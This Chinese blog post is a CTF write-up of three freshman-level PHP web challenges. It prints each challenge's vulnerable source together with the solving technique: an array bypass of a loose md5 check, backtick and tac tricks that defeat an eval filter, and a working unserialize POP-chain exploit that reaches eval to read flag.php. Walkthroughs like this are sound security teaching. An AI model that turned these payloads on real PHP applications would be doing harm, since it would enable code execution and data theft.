首页 > 其他分享 >Tron_CTF2024新生赛 WEB

Tron_CTF2024新生赛 WEB

时间:2024-05-30 12:21:56浏览次数:27  
标签:__ WEB Tron function class CTF2024 源码 hhh public

web业余憨憨简单复现一下,不过有两题环境挂了

s1mple_php

题目

easy

我的解答:

源码:

 <?php
highlight_file(__FILE__);
include("flag.php");
$c = $_POST['c'];
$v = $_GET['v'];
$e = $_GET['e'];
if(isset($_GET['v']) and isset($_GET['e'])){
    if ($_GET['v'] != $_GET['e']){
        if ((md5($_GET['v']) == md5($_GET['e']))){
            if(isset($_POST['c'])){
                echo $flag;
            }else{
                die('no!!!');
            }
        }else{
            die('wrong!');
        }
    }else{
        die('wrong wrong !!');
    }
}else{
    die('wrong wrong wrong!!!');
}
?>
wrong wrong wrong!!!

简单的md5弱比较绕过,保证v和e值不同但md5值相同。可以用数组绕过:v[]=123&e[]=456

c就随便了。传个值就行。

秒了

题目

你会RCE吗?

我的解答:

源码:

 <?php
error_reporting(0);
highlight_file(__FILE__);
include('flag.php');
$c = $_POST['c'];
$c = str_replace("("," ",$c);
$c = str_replace("."," ",$c);
$c = str_replace("cat"," ",$c);
eval($c);
?>

分析可知它屏蔽了"(" "."和"cat",我们可以使用反引号 ` 通配符 * 以及 tac绕过。

fxlh

题目

你会造链子吗?

我的解答:

源码:

 <?php
highlight_file(__FILE__);
class zzz
{
    public $z;
    function __construct($z)
    {
        $this->z = $z;
    }
    function __destruct()
    {
        $this->z->pdf();
    }
}
class hhh
{
    public $h;
    function __call($onename,$val)
    {
        echo $this->h->docx;
    }
}
class ccc
{
    public $c;
    function __construct($c)
    {
        $this->c = $c;
    }
    function __get($Attribute)
    {
        eval($this->c); 
    }
}
$p = $_GET['p'];
if(isset($p) and !preg_match('/system/i',$p)) {
    unserialize($_GET['p']);
}else{
    die('no system!!!');
}
?>
no system!!!

首先找到链尾,去找满足出触发_get方法的条件,这里在hhh类里利用h变量可以触发

再去找触发_call方法的条件,这里在zzz类里利用_destruct()方法可以触发

构造POC如下:

<?php
class zzz
{
    public $z;
    function __destruct()
{
    $this->z->pdf();
}
}
class hhh
{
    public $h;
}
class ccc
{
    public $c = "echo `cat flag.php`;";
}
$en = new zzz();
$s = new hhh();
$e = new ccc();
$en -> z = $s;
$s -> h = $e;
echo serialize($en);
?>

 

标签:__,WEB,Tron,function,class,CTF2024,源码,hhh,public
From: https://www.cnblogs.com/mumuhhh/p/18222110

相关文章

  • 在Linux中,如何进行Web服务器调优?
    在Linux中进行Web服务器调优主要涉及以下几个方面:选择合适的Web服务器软件、配置Web服务器设置、优化网络和硬件资源、以及确保安全性。以下是一些针对常见Web服务器软件(如Apache和Nginx)的调优步骤:1.对Apache进行调优安装Apache:sudoapt-getupdatesudoapt-getinstalla......
  • 在开发系统中将 .net core 6.0 Web API 部署到 IIS 无法正常工作
    发布到本地文件夹并配置到IIS进行测试的.netcore6.0Webapi无法正常工作。Thissitecan'tbereachedlocalhostrefusedtoconnect.请尝试:检查连接检查代理和防火墙ERR_CONNECTION_REFUSED已执行步骤......
  • 深入解析Web前端三大主流框架:Angular、React和Vue
    Web前端三大主流框架分别是Angular、React和Vue。下面我将为您详细介绍这三大框架的特点和使用指南。Angular核心概念:组件(Components):组件是Angular应用的构建块,每个组件由一个带有装饰器的类、一个HTML模板、一个CSS样式表组成。组件通过输入(@Input)和输出(@Output)装饰......
  • NET的应用领域:常用的客户端软件(C/S),Web网站(B/S),工控机软件。
    0201002小白理解听我解释开发语言和开发环境使用1认识.NET平台.NET的读法:DOTNET。DOT是英文”点“的含义。.NET是一种平台,我们在进行.NET平台开发的时候首先要进行.NET平台的部署。在安装VS的时候,下图a中黄色的部分都安装到了对应的操作系统之上。比如Mac,Win10等等。......
  • WindowsCA证书服务(六)为CAweb颁发机构配置证书
    简介CA搭建好了,证书也申请了,完了么?没有,连一半都没有做完,凑活到不及格。为什么不及格,中级课程才刚开始:CAweb颁发证书,ocsp联机响应,crl注销列表,aia授权列表,自动备份,手动恢复,信任冲突,代码签名……为CAweb申请证书自己发证书,自己都没有证书,真惭愧啊,不过这顺序是为了方便简单凑活的......
  • $Web3.0$ ——用热度冲击未来世界
    \(Web3.0\)——用热度冲击未来世界刘若存中国石油大学(华东)摘要自2021年\(Web3.0\)推出,\(Web3.0\)创建了一个全新的生态系统和独立的经济体系,相继衍生出加密货币、DeFi、NFT等多种新事物,它们作为\(Web3.0\)经济体系的基础架构,非常突出的一个特点就是变化幅度较大,导致出现“......
  • 【CTF Web】CTFShow web13 Writeup(RCE+PHP+通配符)
    web131阿呆彻底呆了,阿呆拿起谷姐搜索好久,终于找到更狠的方法。解法可知flag在config.php。<?php#flaginconfig.phpinclude("config.php");if(isset($_GET['c'])){$c=$_GET['c'];if(!preg_match("/system|exec|highlight|cat|\.|......
  • 升鲜宝供应链管理系统重构版发布(技术点:Java8、mysql8.0 uniapp、vue、android、web 框
    升鲜宝供应链管理系统重构版发布(技术点:Java8、mysql8.0uniapp、vue、android、web框架:Vue3+SpringBoot3),界面功能(三) 主要功能要点:     权限管理(组织机构、用户管理、角色管理、岗位管理)     系统设置(菜单管理、参数管理、数据字典、定时任务、文件管......
  • WEB入门 - 文件上传
    WEB入门-文件上传参考文章https://fushuling.com/index.php/2023/08/20/ctfshow刷题记录持续更新中/https://www.cnblogs.com/sen-y/p/15579078.htmlhttp://i0921.cn/blog/5dc52b0aba304f6314a9229f/662062c9ed9f76063b6ceb80web151<buttontype="button"class="layui......
  • webstrom中npm install err 问题
    npmERR!pathD:\gitcode\yoyochatroom1.0\YoYo_Chat_Room/package.json这里的package.json终端显示没有路径,因为需项目具有package.json的文件中开启终端那么我们在设置中找到设置找到终端启动目录就可以了。如果还有问题可以在排卵期聊。......